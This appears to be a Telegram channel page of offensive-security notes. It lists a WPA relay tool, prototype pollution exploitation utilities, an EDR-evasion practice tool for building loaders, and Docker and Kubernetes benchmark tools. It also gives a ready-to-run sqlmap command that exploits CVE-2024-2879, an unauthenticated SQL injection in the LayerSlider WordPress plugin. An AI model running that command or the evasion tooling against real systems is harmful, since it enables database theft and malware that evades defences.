uz
Feedback
offsec notes

offsec notes

Kanalga Telegram’da oβ€˜tish
223
Obunachilar
Ma'lumot yo'q24 soatlar
Ma'lumot yo'q7 kun
+230 kun
Postlar arxiv
WPA_Sycophant A tool to relay phase 2 authentication attempts to access corporate wireless without cracking the password. #wifi

Kaspersky default exception

Prototype pollution Utils
* PPScan - Client Side Protype pollution Scanner * fingerprint.js - script for finding gadgets * untrusted-types - Chrome extension that abuses Trusted Types to log DOMXSS sinks * pollute.js - simple tool to make it easier to exploit prototype pollution
List of known gadget
* Link - examples of libraries that are vulnerable to Prototype Pollution * Link - payloads for known libraries

Repost from Threat Hunt
#maldev #redteam Π˜Π½ΡΡ‚Ρ€ΡƒΠΌΠ΅Π½Ρ‚ для ΠΈΠΌΠΈΡ‚Π°Ρ†ΠΈΠΈ повСдСния AV/EDR. Π£Ρ‚ΠΈΠ»ΠΈΡ‚Π° позволяСт ΠΎΡ‚Ρ‚Π°Ρ‡ΠΈΠ²Π°Ρ‚ΡŒ Π½Π°Π²Ρ‹ΠΊΠΈ ΠΎΠ±Ρ…ΠΎΠ΄Π° срСдств Π·Π°Ρ‰ΠΈΡ‚Ρ‹ ΠΏΡ€ΠΈ создании своих Π·Π°Π³Ρ€ΡƒΠ·Ρ‡ΠΈΠΊΠΎΠ². 1. Π‘ΠΎΠ±ΠΈΡ€Π°Π΅ΠΌ ΠΏΡ€ΠΎΠ΅ΠΊΡ‚ ./compile.sh 2. Π‘ΠΎΠ·Π΄Π°Ρ‘ΠΌ Ρ„Π°ΠΉΠ» ioc.json с ΠΏΠ°Ρ‚Ρ‚Π΅Ρ€Π½Π°ΠΌΠΈ шСлл-ΠΊΠΎΠ΄Π° 3. ЗапускаСм инструмСнт, ΡƒΠΊΠ°Π·Ρ‹Π²Π°Π΅ΠΌ ΠΈΠ΄Π΅Π½Ρ‚ΠΈΡ„ΠΈΠΊΠ°Ρ‚ΠΎΡ€ врСдоносного процСсса: .\CrimsonEDRPanel.exe -d C:\Temp\CrimsonEDR.dll -p 1234 https://github.com/Helixo32/CrimsonEDR

Repost from Proxy Bar
CVE-2024-2879 LayerSlider ΠΏΠ»Π°Π³ΠΈΠ½ для WordPress * ВСрсии LayerSlider 7.9.11 - 7.10.0 - Unauthenticated SQL Injection * НСдостаточнС экранированиС позволяСт Π΄ΠΎΠ±Π°Π²Π»ΡΡ‚ΡŒ Π΄ΠΎΠΏΠΎΠ»Π½ΠΈΡ‚Π΅Π»ΡŒΠ½Ρ‹Π΅ SQL-запросы ΠΊ ΡƒΠΆΠ΅ ΡΡƒΡ‰Π΅ΡΡ‚Π²ΡƒΡŽΡ‰ΠΈΠΌ, ΠΊΠ°ΠΊ ΠΈΡ‚ΠΎΠ³ = ΠΌΠΎΠΆΠ½ΠΎ ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚ΡŒ для извлСчСния ΠΊΠΎΠ½Ρ„ΠΈΠ΄Π΅Π½Ρ†ΠΈΠ°Π»ΡŒΠ½ΠΎΠΉ ΠΈΠ½Ρ„ΠΎΡ€ΠΌΠ°Ρ†ΠΈΠΈ ΠΈΠ· Π±Π°Π·Ρ‹ Π΄Π°Π½Π½Ρ‹Ρ…. * POC usage: sqlmap "https:://OLOLO.com/wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=" --risk=3 --level=4 --dbms=mysql --technique=T or sqlmap -r request.txt --risk=3 --level=4 --dbms=mysql --technique=T #wordpress

Π£Ρ‚ΠΈΠ»ΠΈΡ‚Ρ‹ для провСдСния CIS docker / kubernetes Benchmark'ΠΎΠ² * docker-bench-security * kube-bench